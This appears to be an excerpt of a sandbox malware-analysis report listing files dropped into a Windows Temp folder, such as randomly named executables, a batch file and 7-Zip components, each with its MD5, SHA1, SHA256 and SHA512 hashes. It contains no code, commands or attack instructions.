C:\Users\Admin\AppData\Local\Temp\nvsvnvnrdxbvm.exe

MD5 d076c4b5f5c42b44d583c534f78adbe7
SHA1 c35478e67d490145520be73277cd72cd4e837090
SHA256 2c63c61e0adaaf669c9c674edfc9081d415c05b834611944a682f120ab9559d8
SHA512 b2dfcf98695e7e40578f02a104a1c2fa1de29d13b0056d3dc4a5689168546f437bfd6acbc99e3766f94efb01bac5c908f3e80795f017e1629c97b6b1026ce638

C:\Users\Admin\AppData\Local\Temp\nvsvnvnrdxbvm.exe

MD5 d076c4b5f5c42b44d583c534f78adbe7
SHA1 c35478e67d490145520be73277cd72cd4e837090
SHA256 2c63c61e0adaaf669c9c674edfc9081d415c05b834611944a682f120ab9559d8
SHA512 b2dfcf98695e7e40578f02a104a1c2fa1de29d13b0056d3dc4a5689168546f437bfd6acbc99e3766f94efb01bac5c908f3e80795f017e1629c97b6b1026ce638

C:\Users\Admin\AppData\Local\Temp\kvcpenojxtvawxwh.exe

MD5 6736c0e1179296ff6dfa0191ac874c7a
SHA1 89566e42fb866eecf5e8282b967461299ab7a08c
SHA256 c60ecd5714a23a727d9749652883ec95bcdb350b9f278c34ac504edb898073e4
SHA512 85791acbc9d538b92ac3c10a5ee87638ee0d9dd0323aa1eaf38c1c055e4312e5722f6b07e3f450c00cd595123a9981815a8ca972432749ee830852a76177125c

C:\Users\Admin\AppData\Local\Temp\kvcpenojxtvawxwh.exe

MD5 6736c0e1179296ff6dfa0191ac874c7a
SHA1 89566e42fb866eecf5e8282b967461299ab7a08c
SHA256 c60ecd5714a23a727d9749652883ec95bcdb350b9f278c34ac504edb898073e4
SHA512 85791acbc9d538b92ac3c10a5ee87638ee0d9dd0323aa1eaf38c1c055e4312e5722f6b07e3f450c00cd595123a9981815a8ca972432749ee830852a76177125c

C:\Users\Admin\AppData\Local\Temp\main\main.bat

MD5 7f4c4965a2f78d6de87d304fdd355abf
SHA1 87a05c16753a036126677fe53118c07d36c0e671
SHA256 ed489607187114988306637dae2b81eff225315a8a8ee221249d14430f264fdb
SHA512 41c949862477065b8f537670b6747074c9e543753812fcb28b02be12b1bbf0fb8b9473ea0859fb1450fee848d62d4c70249d09f48a5e5eac15eb510b70b3f741

C:\Users\Admin\AppData\Local\Temp\main\file.bin

MD5 7cebec977eb671d25c4160ee75cbf124
SHA1 e09e0e906834b7f2ec270ba589a01e455ebdf0d1
SHA256 f0e78c63d52116f121709480935013c26a99bd85ba6bfd5100bc5e4411c7178e
SHA512 b79c8d6d4c947fdee755ef81c5c36d657ca1b4030c8f90f906961a22968c98d8fb6e33302191c28135c2593598876b6921f766270a50063754927b4404c798d1

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 72491c7b87a7c2dd350b727444f13bb4
SHA1 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 72491c7b87a7c2dd350b727444f13bb4
SHA1 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
